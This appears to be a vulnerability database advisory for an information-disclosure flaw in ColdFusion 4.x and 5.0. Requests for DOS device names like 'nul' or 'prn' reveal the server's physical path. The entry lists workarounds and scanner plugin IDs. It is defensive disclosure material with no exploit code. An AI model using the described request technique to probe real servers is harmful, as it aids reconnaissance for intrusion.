|
|
Info |
Last Modified |
| 5 months ago |
|
|
|
|
Description |
ColdFusion allows a remote attacker to learn the physical path of the web server. By requesting a URL with a DOS device file name such as "nul" or "prn", the server will return an error page that includes the physical path the web server runs from. This can be used to launch more focused attacks.
|
|
Classification |
Location:
Remote/Network Access Required
Attack Type:
Information Disclosure
Impact:
Loss of Confidentiality
Exploit:
Exploit Available
Disclosure:
OSVDB Verified
OSVDB:
Web Related
|
|
Solution |
Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workarounds: Install the Microsoft URLScan utility or configure IIS to verify a file exists else display an IIS error page instead of the ColdFusion page.
|
|
Products |
|
ColdFusion
 |
4.x |
5.0 |
|
|
|
|
Tools & Filters |
|
Nikto
|
3048
3049
3050
3051
|
|
Nessus
|
11393
|
|
|
|
Credit |
Unknown or Incomplete
|
|
BlogsProvided by Technorati
|
None found at this time
|
|
|
